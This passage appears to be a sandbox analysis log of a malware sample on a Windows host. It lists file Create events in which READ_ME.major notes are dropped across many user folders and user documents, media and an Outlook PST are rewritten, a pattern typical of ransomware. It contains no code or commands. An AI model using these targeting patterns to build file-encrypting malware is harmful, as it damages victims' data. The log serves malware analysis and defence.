| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.026.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.025.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.024.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.023.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.022.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.021.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.020.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.019.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.018.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.017.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.016.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.015.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.014.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.013.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.012.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.011.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.010.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.009.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.008.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.007.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.006.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.005.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.004.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.003.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.002.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.001.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUxBroker.017.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUxBroker.016.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUxBroker.015.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUxBroker.014.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUxBroker.013.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUxBroker.012.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUxBroker.011.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUxBroker.010.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUxBroker.009.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUxBroker.008.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUxBroker.007.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUxBroker.006.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUxBroker.005.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUxBroker.004.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUxBroker.003.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUxBroker.002.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUxBroker.001.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUx.002.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\NotificationUx.001.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\ActiveSync\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\Adobe\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\Application Data\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\CEF\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\Comms\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\ConnectedDevicesPlatform\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\Google\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\History\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\MicrosoftEdge\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\Mozilla\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\Packages\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\PeerDistRepub\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\Publishers\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\Temporary Internet Files\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\TileDataLayer\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\UNP\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\VirtualStore\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\IconCache.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\LocalLow\Adobe\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\LocalLow\Mozilla\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\LocalLow\Sun\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\Adobe\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\Macromedia\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\Mozilla\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\Skype\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\Sun\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\yPvcK9KKYDCNPu8UYfI.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\ykRZT9aW6s0hg4oEJH.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\YHwAAwd61Qg6XnA280n.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\y3TLzbk NEn3xjke7z.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\XjanlTX039MqQ89Zhye.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\W4SMtZ5NJNaWq.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\vmWcWAmW3UGUWSW.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\vF8wdqX0efbQr6Uyf.mkv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\t_lMeO-W9T1uHL.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\TEE3YHnKdV7Vhk.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\SNDUoBILSaAUYavUVF_.mkv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\SmmBWCLZVanpZAwYueZ.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\scl0E03IE5Rcs.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\R E5gtd14baa.mkv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\qUHTUX36HLp05nP.ods | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\O_EoIb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\Oq8bnDM.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\oN9ww_0Ihya.ots | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\O2vF28u35n5d.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\LgcAqJUZEzD.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\J wJP3QqtMQql1WF11F9.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\iN9p 5c.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\hIWXI_.swf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\gS2boS XLxbRhLdyI.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\ExGg5Jd4qa.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\EKGIQmO.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\E8c5e.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\CDxZIs.odp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\c65QncG.swf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\bQ_MHQ3CZH6Ech05-U.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\BjBC.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\9NAPcyvPM4.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\5marn.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\1jFRqMGYP.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Roaming\-LHHhSld27E.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\PFR2M-o0qt2\Z8ZmBjcshL9T.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\PFR2M-o0qt2\w-jv80La0-FO.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\PFR2M-o0qt2\UlFavsILucGX4X_RoL.ods | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\PFR2M-o0qt2\PEzo.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\PFR2M-o0qt2\LKNp-N0.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\PFR2M-o0qt2\K- OG9wC.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\PFR2M-o0qt2\IFvqg2hgWuI5Wr2dp.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\PFR2M-o0qt2\aIgn9mFBQPRyTXFS.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\PFR2M-o0qt2\57DUQNI24EaxqR tZu.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\PFR2M-o0qt2\2iVEgtc.flv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Desktop\PFR2M-o0qt2\2dbfm XwykSXRZNxS.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\cupDn\ovhur4oc20Jwn.ods | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\cupDn\L4a2vrKqmMmeGay.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\cupDn\aG_ILdnlK6A76fygFr.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\cupDn\ADKDMYjR.ots | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\cupDn\6tEoR.pptx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\My Shapes\_private\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\My Shapes\Favorites.vssx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\My Shapes\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\Outlook Files\kkcie@kdj.kd.pst | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\QIddoQWl8eDSDIqz\iBkXE7cA\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\QIddoQWl8eDSDIqz\IKcsRIo9dLn\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\QIddoQWl8eDSDIqz\mkzVCdF4yBYNJ2CnJ\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\QIddoQWl8eDSDIqz\o rzjH_Ab.ods | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\QIddoQWl8eDSDIqz\9Wxq-IexF49BHuLEER0W.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\QIddoQWl8eDSDIqz\0XP1ibgaW3KvAg.ots | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\SpY7Gp\4edlql\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\SpY7Gp\Dqh2Lyx5DPbcADWmSj\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Documents\SpY7Gp\hyTP eabQy_cNDtOCad.doc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Favorites\Links\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\CJCEOTnU\yh-hv8F_.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\CJCEOTnU\gQMQhsJA5kQ1UM.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\CJCEOTnU\BvhuPrvJCAhvBb.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\HFGXh7wtD7-UGQ8Fgf\SgS5GD8k6O-9.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\HFGXh7wtD7-UGQ8Fgf\PuHtX-8LsdCPd_.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\HFGXh7wtD7-UGQ8Fgf\lC_qRngzcQLt2ZA3.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\HFGXh7wtD7-UGQ8Fgf\J-8z3jf.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\HFGXh7wtD7-UGQ8Fgf\1xLqe.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\rai3Ivo\dVS7sBA\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\rai3Ivo\vTZvJKhBqcN\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\rai3Ivo\NWldvt6jg 7w.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\rai3Ivo\N-3ME2VVR1X.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\SIFlnPdoC-GGQ\Ohhew1xd94o1f0nRmx.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\SIFlnPdoC-GGQ\Kgzu_sNYYXKauV.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\SIFlnPdoC-GGQ\dBGrIeOazI_1.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\SIFlnPdoC-GGQ\AJQ0r-A 5.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\TvaUMz0SYA\8hmA-v_b\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
